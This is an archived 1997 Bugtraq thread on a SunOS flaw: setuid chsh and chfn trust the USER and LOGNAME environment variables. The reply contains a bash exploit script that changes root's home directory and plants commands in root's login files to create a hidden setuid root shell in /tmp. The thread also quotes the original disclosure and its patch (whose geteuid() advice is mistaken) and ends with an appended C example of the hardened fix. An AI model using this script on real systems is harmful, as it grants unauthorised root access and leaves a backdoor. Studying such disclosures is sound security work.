[4516] in bugtraq
Date: Mon, 19 May 1997 07:19:31 +0000
Reply-To: Trevor Linton <blind@SEDATED.NET>
From: Trevor Linton <blind@SEDATED.NET>
X-To: Nick Simicich <njs@scifi.squawk.com>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.970519203108.714O-100000@scifi>
Here's a rough script to get root; this is more of an algorithm than
a working script, but in "theory" it will work. This will work
if chsh and chfn are +s'ed, and if they use getenv.
------ CUT ------
#!/bin/bash
#
# Very basic, i need a way to set root shell to /tmp/.tmp
# chfn on some systems will set the directory on some it wont.
# depends.. :\
#
# patch:
# 1) -s both chfn and chsh
# 2) edit the source code for chfn and chsh and remove
# getenv("LOGNAME") and or getenv("USER") and replace
# with getuid(); ..
#
mkdir -f /tmp/.tmp
export USER="root"
export LOGNAME="root"
echo Set the HOME DIRECTORY RIGHT NOW TO /tmp/.tmp
chfn
echo "Set the SHELL TO /bin/bash!"
chsh
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.profile
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.profile
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.profile
echo "Exploit set, wait a day then log back on and execute"
echo "/tmp/.exp to get root, /tmp/.exp is a sh shell when"
echo "root logs in it'll be +s'ed"
-----------------
blind - blind@root.hax0r.org support@hax0r.org
Swingin' Utters. a juvenile product of the working class.
On Mon, 19 May 1997, Nick Simicich wrote:
> Of course, if Bash was changed, I could change them from perl, or a C
> program, and then run bash out of my C program or Perl.
>
> You were right the first time - don't trust your environment unless you
> control it.
>
> On Sun, 18 May 1997, Trevor Linton wrote:
>
> > Date: Sun, 18 May 1997 13:36:00 +0000
> > From: Trevor Linton <blind@SEDATED.NET>
> > To: best-of-security@suburbia.net
> > Subject: BoS: SunOS exploit.
> > Resent-Date: Tue, 20 May 1997 09:21:05 +1000 (EST)
> > Resent-From: best-of-security@suburbia.net
> >
> >
> > On SunOS, if you execute a clean bash shell, then type export USER="root"
> > and USER=$LOGNAME, then execute chsh root or chfn root, you can change
> > the root information.
> >
> > Why?
> >
> > Well, first off, chsh and chfn are +s'ed. This is a bad idea in the first
> > place. Second off, chsh and chfn use the function getenv("USER"); most
> > programs bother to use this instead of geteuid(). getenv("USER") reports
> > that the user is root (while geteuid() would report the real userid), and
> > then since chsh and/or chfn is +s'ed it'll change root's shell/user
> > information, or ANYONE on the system's information!
> >
> > On the SunOS system I have, I've been able to lock out ANYONE'S shell
> > using this exploit, locking out root's shell as well as changing
> > anyone's NAME info in /etc/passwd etc., etc. Any program that uses
> > getenv("USER") is vulnerable (that's in bash). tcsh and some other
> > shells I remember don't allow USER and LOGNAME modifying. :\
> >
> > Anyways here's a rough patch:
> > 1) -s the programs that use getenv(); such as chsh and chfn
> > 2) remove getenv() and replace it with geteuid();
> > 3) possibly get the programmers of bash to fix it so USER and
> > LOGNAME can't be modified unless it's super-user.
> >
> > I'm sure there's a way to get root from this exploit butta.. :) oh well.
> >
> > Trevor Linton (blind) - blind@sedated.net support@hax0r.org
> > Swingin' Utters. a juvenile product of the working class.
> >
> > "People who are having trouble communicating should just shuttup"
> >
>
> Of course my password is the same as my pet's name.
> My macaw's name was Q47pY!3, but I change it every 90 days.
> Nick Simicich mailto:njs@scifi.squawk.com or (last choice) mailto:njs@us.ibm.com
> http://scifi.squawk.com/njs.html -- Stop by and Light Up The World!
>
>
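The fix the thread proposes (decide who invoked a setuid tool from the kernel rather than from getenv()), as an added C example that is not part of this post: the environment-based lookup the script abuses, beside the hardened lookup and the ownership check a chsh/chfn-style tool should make. Note that in a setuid-root program getuid() returns the real (invoking) uid while geteuid() returns 0, so getuid() is the call a fix needs; the function names here are my own.

```c
#define _POSIX_C_SOURCE 200809L
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Vulnerable pattern from the thread: a setuid tool that decides "who is
 * running me" from USER/LOGNAME.  The caller sets both before exec, so
 * the answer is caller-controlled. */
const char *caller_from_env(void)
{
    const char *u = getenv("USER");
    if (u == NULL || *u == '\0')
        u = getenv("LOGNAME");
    return u ? u : "";
}

/* Hardened form: ask the kernel.  getuid() is the real uid of the user
 * who invoked the program (geteuid() would be 0 in a setuid-root binary).
 * The name comes from the passwd database, never from the environment;
 * if the lookup fails, fail closed (-1) instead of falling back to getenv(). */
int caller_from_uid(char *name, size_t len)
{
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL || pw->pw_name == NULL || strlen(pw->pw_name) >= len)
        return -1;
    strcpy(name, pw->pw_name);
    return 0;
}

/* Authorization a chsh/chfn-style tool should perform before touching an
 * account: only root, or the account's owner, may edit it.  Based on the
 * real uid, so the environment plays no part in the decision. */
int may_modify_account(uid_t target_uid)
{
    uid_t real = getuid();
    return real == 0 || real == target_uid;
}

int main(void)
{
    char name[64];
    setenv("USER", "root", 1);      /* the same trick as the script above */
    setenv("LOGNAME", "root", 1);
    printf("environment claims: %s\n", caller_from_env());
    if (caller_from_uid(name, sizeof name) == 0)
        printf("kernel says: %s (uid %u)\n", name, (unsigned)getuid());
    return 0;
}
```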